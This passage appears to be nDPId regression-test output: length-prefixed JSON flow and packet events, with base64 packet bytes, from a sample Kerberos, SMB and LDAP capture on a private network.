c6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} -02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZEFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="} -00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="} -00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929981,"flow_last_seen":1549337929981,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337929981,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1549337929981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337929981,"pkt":"pB9ywglqAAgCHEeuCABFAADBADZAAIAGkQ+sEAjJrBAICMAKAFgVCzarRRAS7FAYAQB2LAAAqoGWMIGToAMCARKigYsEgYi0+C7lIM6lpWfLcf2ezyusajpC0TYc1OX1vmb3DhkyjRtC5TeZRg9Wzt\/ubCTSXWpwv+zrJOhZpUKxM\/PhogQbKSmJJuvTC3n4CxJc9SponZNFKF1Kt9\/yiDsesCZaEKdbgZEf1rZ1aHAiihciexKw\/Qr8RPyDjBEhr0yc0K8+XP7zeT3kqKdm"} -00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAACmEzJAAIAGfi6sEAgIrBAIyQBYwApFEBigFQs3RFAYAQCNWQAABoWQU5dMx7s3k7lFXcqa6uoE3YqM179MtGFm5Pp0PzGMSHM6ikhCYuxEbF8vf630PDV4M+ymDkgmnA6LZ83pNOsEhGLNGEwQsGjuja+QpA2dd9fjedDg4z2eYZ9DeqXNfMVtviu+Fd00prhwc+9nnU9I900bDPmSAhZM9lsL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337929983,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337929983,"pkt":"pB9ywglqAAgCHEeuCABFAAEyADpAAIAGkJqsEAjJrBAICMAJAYUOQjJnSJfL+1AYAQBrWQAA8TZc0LDMp13P2bhHUwE3wC3znhyPA6u84KleikgMfgmc3jalHTIxDwXMnjy\/W4F7\/2WZoUcx2XOew9rGWayLePl5BZIz7shN5PFXYJc\/9PAyv29TC7M2XLiMKexhyeYlRE9uvUtK9DAnR\/ttWEC9zdC56cQON1H8q936tfR+Slz7RKm2uwASDHI8fSFcEQQxtgqaAo4BBsj3qlqLB0lXoxQ8eGOcEVy2\/38vMlSj+c\/3tdAxc+T2J+ChqVKK6Ti6p9NJhgfdb6n6Fkr1nJ\/E0PHo7Ab3tBkqkSpNzV9oaIDc\/AnEKYXHdAsdm\/IAEKeNDZ3xj3dnB41oCyCZcvi9r2HqvrS9bMHFZEs="} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"} -00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337930217,"pkt":"AAgCHEeupB9ywglqCABFAACmE1FAAIAGfg+sEAgIrBAIyQBYwBCtJNt5bgP1KVAYAQC1BwAApQG9zo7oa2HyeKU61c2m29Ax+Ioczo4ZbPhC81jR0pDanr7lBKhJeMuGW\/uva7FyAslnHaJSlZ\/JCHVy9T8T0Ut1tj8cqy\/o\/YC+6XwQJV1\/l63dulAmK8KMVnuSbTDSVBQ5iahKxwLlZ8cbK3LMBirQeX8FcESDlzlIPsVQ"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930219,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":1,"thread_ts_msec":1549337930219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":429,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":429,"pkt_l4_len":395,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAGfAF1AAIAGkAqsEAjJrBAICMANwANTRo4+sysn9FAYAQASVgAAOJsrJlDNtr7H4lcner+4Ya97utGtvfHqO\/A9pIIBWDCCAVSgAwIBEqKCAUsEggFHE7YBEd08uXxTAz9oATIBnzsu+CIXQ7IKgHphso5XWVrf1UwI0kS3bNe0YDIltyDk2xHWA\/s5Rnf1JAD5LdMYfWfRtly9XMnusGEqHhr+HUrsB70ut1E9AZfE9oDmCRiRKgSi\/yPqeUdMQ3mTdU1fxpZbOqOrcP2UxT7TverwRJibh+asJMQhC1cH82k0XRAktx95xJlXR3QKNE1DR8fsq9gq2Y16fmA9gsztPUDC4IkAL71ItK34puHol45q2g1+vM2umAkKTXGS4uZkIzxH5rv1eNIbWz6GtEw1jeT5kTsqyd\/cgQicx4yHy9VJKmfjweCCyOHHgJ0JONAYKLNrmUspunn\/qiNj30BsQPTsl8DziFoWtJvBGiR7UAPGmzNl3CewZOrjtG26JZPGTaTuBek+GwxKg7cb\/ze4riey9Wnfq0rUqdvf"} 